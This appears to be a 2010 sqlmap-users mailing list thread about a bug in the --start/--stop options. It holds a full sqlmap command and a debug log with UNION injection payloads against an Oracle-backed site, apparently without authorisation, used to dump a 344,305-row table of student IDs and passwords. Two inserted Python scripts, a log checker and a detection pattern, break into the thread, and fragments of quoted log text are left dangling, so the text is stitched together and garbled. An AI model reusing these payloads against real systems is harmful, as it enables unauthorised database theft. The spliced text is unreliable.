Thread: [sqlmap-users] Bug(?) with --start/stop in oracle(maybe others)
From: David G. <sk...@gm...> - 2010-04-24 02:02:30
Syntax that had problems:

$ ./sqlmap.py -u "http://www.vuln.com/vuln.asp?a=000408092&b=" -p a --union-use -T ALU_ALUNOS --dump -C "ALU_RA,ALU_SENHA" --start 0 --stop 4 -v 2

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 22:52:50

[22:52:50] [DEBUG] initializing the configuration
[22:52:50] [DEBUG] initializing the knowledge base
[22:52:50] [DEBUG] cleaning up configuration parameters
[22:52:50] [DEBUG] setting the HTTP timeout
[22:52:50] [DEBUG] setting the HTTP method to GET
[22:52:50] [DEBUG] creating HTTP requests opener object
[22:52:50] [DEBUG] parsing XML queries file
[22:52:50] [INFO] using '/path/session' as session file
[22:52:50] [INFO] resuming injection point 'GET' from session file
[22:52:50] [INFO] resuming injection parameter 'a' from session file
[22:52:50] [INFO] resuming injection type 'stringsingle' from session file
[22:52:50] [INFO] resuming 0 number of parenthesis from session file
[22:52:50] [INFO] resuming back-end DBMS 'oracle' from session file
[22:52:50] [INFO] resuming union comment '--' from session file
[22:52:50] [INFO] resuming union count 15 from session file
[22:52:50] [INFO] resuming union position 1 from session file
[22:52:50] [INFO] resuming union false condition 1 from session file
[22:52:50] [INFO] testing connection to the target url
[22:52:50] [DEBUG] got HTTP error code: 500
[22:52:50] [WARNING] the testable parameter 'a' you provided is not into the Cookie
[22:52:50] [INFO] testing for parenthesis on injectable parameter
[22:52:50] [DEBUG] skipping test for MySQL
[22:52:50] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle

[22:52:50] [WARNING] on Oracle it is only possible to enumerate if you provide a TABLESPACE_NAME as database name. sqlmap is going to use 'USERS' as database name
[22:52:50] [INFO] fetching columns 'ALU_RA, ALU_SENHA' entries for table 'ALU_ALUNOS' on database 'USERS'
[22:52:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are in front of a partial inband sql injection
[22:52:50] [INFO] read from file '/path': 344305
[22:52:50] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(COUNT(ALU_RA) AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM ALU_ALUNOS-- AND 'RFOj'='RFOj
[22:52:51] [DEBUG] performed 1 queries in 0 seconds
[22:52:51] [INFO] the SQL query provided returns 344305 entries
[22:52:51] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=1-- AND 'qGli'='qGli
[22:52:51] [DEBUG] performed 2 queries in 0 seconds
[22:52:51] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=2-- AND 'EXyf'='EXyf
[22:52:53] [DEBUG] performed 3 queries in 1 seconds
[22:52:53] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=3-- AND 'CLyw'='CLyw
[22:52:56] [DEBUG] performed 4 queries in 2 seconds
[22:52:56] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=4-- AND 'nHQn'='nHQn
[22:52:57] [DEBUG] performed 5 queries in 0 seconds
[22:52:57] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=5-- AND 'iNmX'='iNmX
[22:52:58] [DEBUG] performed 6 queries in 1 seconds
[22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=6-- AND 'mVQM'='mVQM
[22:52:58] [DEBUG] performed 7 queries in 0 seconds
[22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=7-- AND 'FuqF'='FuqF
[22:52:59] [DEBUG] performed 8 queries in 0 seconds
[22:52:59] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=8-- AND 'utPd'='utPd
[22:53:01] [DEBUG] performed 9 queries in 2 seconds
[22:53:01] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=9-- AND 'ilBw'='ilBw
[22:53:03] [DEBUG] performed 10 queries in 2 seconds
[22:53:03] [DEBUG] query: ' UNION ALL SELECT NULL, CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA AS VARCHAR(4000)), CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA AS VARCHAR(4000)), CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT=10-- AND 'YxAK'='YxAK
^C
[22:53:04] [ERROR] user aborted

[*] shutting down at: 22:53:04

As you can see, it will not stop consultation until the fourth, ignoring parameters passed in ("--start" and "--stop").

I gave ctrl + c in the tenth query.

Am I doing something wrong or is it anyway?

$ svn info
Path: .
URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
Repository Root: https://svn.sqlmap.org/sqlmap
Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb
Revision: 1588
Node Kind: directory
Schedule: normal
Last Changed Author: inquisb
Last Changed Rev: 1588
Last Changed Date: 2010-04-23 13:34:20 -0300 (Fri, 23 Apr 2010)

--
David Gomes Guimarães
From: Miroslav S. <mir...@gm...> - 2010-04-26 08:59:57
you've provided --start 0, while it needs to be >0. we'll add the proper warning for this into runtime.

kind regards.

--
Miroslav Stampar
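Added example (not part of the thread and not sqlmap's own code): a small checker that reads a sqlmap debug log of the shape posted above, extracts the ROWNUM index of every per-row query, and reports which requests fall outside the --start/--stop values. The sample log is constructed and abbreviated from the thread's output; the function names, the 1-based inclusive range and the report keys are assumptions.

```python
import re

# Per-row query shape taken from the debug output quoted in this thread:
#   [hh:mm:ss] [DEBUG] query: ... ROWNUM AS LIMIT FROM <table>) WHERE LIMIT=<n>-- ...
ROW_QUERY = re.compile(
    r"^\[(?P<ts>\d{2}:\d{2}:\d{2})\] \[DEBUG\] query: .*"
    r"ROWNUM AS LIMIT FROM (?P<table>\w+)\) WHERE LIMIT=(?P<row>\d+)--"
)


def requested_rows(log_text):
    """Return (timestamp, table, row_index) for every per-row query, in log order."""
    found = []
    for line in log_text.splitlines():
        match = ROW_QUERY.match(line.strip())
        if match:
            found.append((match["ts"], match["table"], int(match["row"])))
    return found


def check_range(rows, start=None, stop=None):
    """Compare requested row indexes with the --start/--stop values.

    Assumption (not confirmed by the thread): indexes are 1-based and both
    bounds are inclusive. The thread only states that --start must be > 0.
    Missing rows are not flagged, because a run may be aborted early (^C).
    """
    start_valid = start is None or start > 0
    lower = start if (start is not None and start > 0) else 1
    indexes = [row for _, _, row in rows]
    outside = [
        row for row in indexes
        if row < lower or (stop is not None and row > stop)
    ]
    return {
        "start_valid": start_valid,   # False for --start 0
        "requested": indexes,         # every row index the tool asked for
        "outside": outside,           # indexes beyond the requested range
        "honoured": start_valid and not outside,
    }


# Constructed sample: same line shape and timestamps as the thread's log,
# with the long column expression abbreviated to "...".
_TEMPLATE = (
    "[{ts}] [DEBUG] query: ' UNION ALL SELECT NULL, ... FROM (SELECT ALU_RA, "
    "ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE LIMIT={row}-- AND 'x'='x"
)
_TIMES = ["22:52:51", "22:52:51", "22:52:53", "22:52:56", "22:52:57",
          "22:52:58", "22:52:58", "22:52:59", "22:53:01", "22:53:03"]
SAMPLE_LOG = "\n".join(
    [
        # The COUNT query has no ROWNUM subquery and must not be counted as a row.
        "[22:52:50] [DEBUG] query: ' UNION ALL SELECT NULL, ... FROM ALU_ALUNOS-- AND 'x'='x",
        "[22:52:51] [INFO] the SQL query provided returns 344305 entries",
    ]
    + [_TEMPLATE.format(ts=ts, row=i) for i, ts in enumerate(_TIMES, 1)]
    + ["^C", "[22:53:04] [ERROR] user aborted"]
)

if __name__ == "__main__":
    report = check_range(requested_rows(SAMPLE_LOG), start=0, stop=4)
    for key, value in report.items():
        print(f"{key}: {value}")
```

Run against a real log, the "outside" list separates an invalid option value from a range that is ignored regardless of the value passed.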
From: David G. <sk...@gm...> - 2010-04-26 16:42:48
Miroslav:
Doesn't work even passing --start 1 or --start 3 or anything in a table with X rows.. I don't know if this is an Oracle error or other thing.. sqlmap simply ignores the parameter... tested and re-tested... if the table has 100 rows and I pass --start to him to read until the tenth, he will read them all...

On Mon, Apr 26, 2010 at 6:27 AM, Bernardo Damele A. G. <ber...@gm...> wrote:

> Did you try without providing --start and --stop? Let me know please
> if it correctly dump entries or not.
>
> Bernardo

--
David Gomes Guimarães
From: Miroslav S. <mir...@gm...> - 2010-04-26 18:38:16
Hi.

Sorry, my fault. Bernardo said that he knows where to look for this one so he'll try to solve it soon.

Kind regards.
CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=6-- >>> > AND 'mVQM'='mVQM >>> > [22:52:58] [DEBUG] performed 7 queries in 0 seconds >>> > [22:52:58] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=7-- >>> > AND 'FuqF'='FuqF >>> > [22:52:59] [DEBUG] performed 8 queries in 0 seconds >>> > [22:52:59] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=8-- >>> > AND 'utPd'='utPd >>> > [22:53:01] [DEBUG] performed 9 queries in 2 seconds >>> > [22:53:01] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > 
CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=9-- >>> > AND 'ilBw'='ilBw >>> > [22:53:03] [DEBUG] performed 10 queries in 2 seconds >>> > [22:53:03] [DEBUG] query: ' UNION ALL SELECT NULL, >>> > CHR(105)||CHR(77)||CHR(83)||CHR(70)||CHR(120)||CHR(74)||NVL(CAST(ALU_RA >>> > AS >>> > VARCHAR(4000)), >>> > >>> > CHR(32))||CHR(97)||CHR(70)||CHR(79)||CHR(81)||CHR(70)||CHR(84)||NVL(CAST(ALU_SENHA >>> > AS VARCHAR(4000)), >>> > CHR(32))||CHR(77)||CHR(107)||CHR(82)||CHR(107)||CHR(106)||CHR(99), >>> > NULL, >>> > NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL >>> > FROM >>> > (SELECT ALU_RA, ALU_SENHA, ROWNUM AS LIMIT FROM ALU_ALUNOS) WHERE >>> > LIMIT=10-- >>> > AND 'YxAK'='YxAK >>> > ^C >>> > [22:53:04] [ERROR] user aborted >>> > >>> > [*] shutting down at: 22:53:04 >>> > >>> > >>> > >>> > As you can see, it will not stop consultation until the fourth, >>> > ignoring >>> > parameters passed in ("--start" and "--stop"). >>> > >>> > I gave ctrl + c in the tenth query. >>> > >>> > Am I doing something wrong or is it anyway? >>> > >>> > $ svn info >>> > Path: . 
>>> > URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap >>> > Repository Root: https://svn.sqlmap.org/sqlmap >>> > Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb >>> > Revision: 1588 >>> > Node Kind: directory >>> > Schedule: normal >>> > Last Changed Author: inquisb >>> > Last Changed Rev: 1588 >>> > Last Changed Date: 2010-04-23 13:34:20 -0300 (Fri, 23 Apr 2010) >>> > >>> > -- >>> > David Gomes Guimarães >>> > >>> > >>> > ------------------------------------------------------------------------------ >>> > >>> > _______________________________________________ >>> > sqlmap-users mailing list >>> > sql...@li... >>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> > >>> > >>> >>> >>> >>> -- >>> Bernardo Damele A. G. >>> >>> E-mail / Jabber: bernardo.damele (at) gmail.com >>> Mobile: +447788962949 (UK 07788962949) >>> PGP Key ID: 0x05F5A30F >> >> >> >> -- >> David Gomes Guimarães > > > > -- > David Gomes Guimarães > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B |
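Seen from the server side, the per-row requests in the quoted debug log share one shape: a UNION ALL SELECT over an inline view that exposes ROWNUM AS LIMIT, filtered with WHERE LIMIT=n. The following is an added example, not part of the thread or of sqlmap: it scans logged parameter values for that shape and reports which rows of which table were actually requested, which is what scopes exposure regardless of the bounds the operator intended. The function names are hypothetical and the sample values are constructed, abbreviated from the queries quoted above.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Per-row query shape from the debug log in this thread:
#   ... FROM (SELECT <cols>, ROWNUM AS LIMIT FROM <table>) WHERE LIMIT=<n>--
ROW_PROBE = re.compile(
    r"UNION\s+ALL\s+SELECT\b.*?"
    r"FROM\s*\(\s*SELECT\s+(?P<cols>.+?),\s*ROWNUM\s+AS\s+LIMIT\s+"
    r"FROM\s+(?P<table>[\w.$#]+)\s*\)\s*WHERE\s+LIMIT\s*=\s*(?P<row>\d+)",
    re.IGNORECASE | re.DOTALL,
)

def rows_read(param_values):
    """Map (table, columns) -> sorted row numbers requested via the row probe."""
    seen = defaultdict(set)
    for raw in param_values:
        decoded = unquote_plus(raw)  # access logs normally hold URL-encoded values
        m = ROW_PROBE.search(decoded)
        if m:
            cols = tuple(c.strip().upper() for c in m.group("cols").split(","))
            seen[(m.group("table").upper(), cols)].add(int(m.group("row")))
    return {key: sorted(rows) for key, rows in seen.items()}

def contiguous_ranges(rows):
    """Collapse sorted row numbers, e.g. [1, 2, 3, 7, 8] -> [(1, 3), (7, 8)]."""
    ranges = []
    for r in rows:
        if ranges and r == ranges[-1][1] + 1:
            ranges[-1] = (ranges[-1][0], r)
        else:
            ranges.append((r, r))
    return ranges

# Constructed sample: values of parameter 'a' as an access log might record them.
# The payload is abbreviated from the queries quoted in the thread.
_PROBE = ("000408092'+UNION+ALL+SELECT+NULL,+CHR(105)%7C%7CNVL(CAST(ALU_RA+AS+"
          "VARCHAR(4000)),+CHR(32)),+NULL+FROM+(SELECT+ALU_RA,+ALU_SENHA,+ROWNUM+"
          "AS+LIMIT+FROM+ALU_ALUNOS)+WHERE+LIMIT%3D{n}--+AND+'x'%3D'x")
_COUNT = ("000408092'+UNION+ALL+SELECT+NULL,+NVL(CAST(COUNT(ALU_RA)+AS+"
          "VARCHAR(4000)),+CHR(32)),+NULL+FROM+ALU_ALUNOS--+AND+'x'%3D'x")
SAMPLE = ["000408092", _COUNT] + [_PROBE.format(n=n) for n in range(1, 11)]

if __name__ == "__main__":
    for (table, cols), rows in rows_read(SAMPLE).items():
        print(table, ",".join(cols), contiguous_ranges(rows))
```

The COUNT query and the benign value do not match the row-probe shape, so only the ten per-row requests are counted.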